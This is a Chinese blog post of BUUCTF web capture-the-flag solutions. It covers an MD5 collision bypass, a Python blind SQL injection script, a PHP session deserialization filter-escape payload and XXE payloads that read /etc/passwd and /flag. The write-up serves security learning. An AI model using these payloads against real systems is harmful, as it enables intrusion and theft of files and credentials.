buuctf刷题记录

最新推荐文章于 2023-09-04 20:51:58 发布

ta3shi

最新推荐文章于 2023-09-04 20:51:58 发布

阅读量826

点赞数

分类专栏： ctfweb buuctf刷题记录文章标签： php sql

本文链接：https://blog.csdn.net/Realiy/article/details/107836279

版权

ctfweb 同时被 2 个专栏收录

12 篇文章 0 订阅

订阅专栏

buuctf刷题记录

12 篇文章 0 订阅

订阅专栏

8月6日buuctf

[MRCTF2020]Ez_bypass

知识点MD5绕过，php特性

打开得到源码

I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first

MD5强比较，试试数组绕过：

网上找个强绕过的值，然后passwd根据php特性传入1234567s(数据加任意字符即可)

id=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
gg=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

[BJDCTF 2nd]简单注入

扫到robots.txt,发现hint.txt，打开看到

测试发现过滤了',union,select等注入词，看看大佬的做法

用admin\来将'转义，后面就可以用整数型注入,试试or 1#,再试试or 0#

贴上代码,select被过滤了我实在想不到怎么注入得到数据，看大佬的发现直接username和password，学到了...

import requests
import time as ti

url='http://43be6073-99d9-4a0c-b28b-3a35fd75574e.node3.buuoj.cn/index.php'
result = ''

for x in range(1, 50):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        payload="or ascii(substr((database()),%d,1))>%d#"%(x,mid)
        #payload="or ascii(substr((username),%d,1))>%d#"%(x,mid)
        #payload="or ascii(substr((password),%d,1))>%d#"%(x,mid)
        data = {
                "username":"admin\\",
                "password":payload
        }
        #print(payload)
        response = requests.post(url,data=data)
        if 'BJD needs to' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    print(mid)
    result += chr(int(mid))
    print(result)

最后得到username=admin,password=OhyOuFOuNdit，登录就行啦

[安洵杯 2019]easy_serialize_php

php代码审计，反序列化

打开得到以下源码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

f=phpinfo，在其中找到了疑似flag的文件

可以用extract($_POST)来传入我们想要的值，可以看到f=show_image时可以读取文件，但是img直接传会sha1加密，所以可以想到传SESSION的值来反序列化，由filter函数看到seesion值里有php或flag会替换掉，我们就可以将传入的值改变一下。

如我们传入payload1

_SESSION['flagflagflag']=aaaa";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:12:"flagflagflag";s:55:"aaaa";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

由于flag置换为空，变成了

a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:12:"";s:55:"aaaa";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

其中";s:55:"aaaa部分正好12个字符，后面又有"闭合，就可以得到

array(4) {
  ["user"]=>
  string(5) "guest"
  ["function"]=>
  string(10) "show_image"
  ["";s:55:"aaaa"]=>
  string(3) "aaa"
  ["img"]=>
  string(20) "ZDBnM19mMWFnLnBocA=="
}

传入payload1，我们得到：

再将上文base64传入得到

[NCTF2019]Fake XML cookbook

xml的xxe攻击

随便输入一个账号看数据流

<user><username>admin</username><password>admin</password></user>

猜测是xxe攻击

抓包测试一下

可以读取/etc/passwd

测试命令执行

<!DOCTYPE ANY [
  <!ENTITY admin SYSTEM "except://ls">
]>
<user><username>&admin;</username><password>123456</password></user>

发现不支持，最后发现是猜flag位置

最终payload

<!DOCTYPE ANY [
  <!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>

ta3shi

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
buuctf刷题记录

8月6日buuctf[MRCTF2020]Ez_bypass知识点MD5绕过，php特性打开得到源码I put something in F12 for youinclude 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (m
复制链接

扫一扫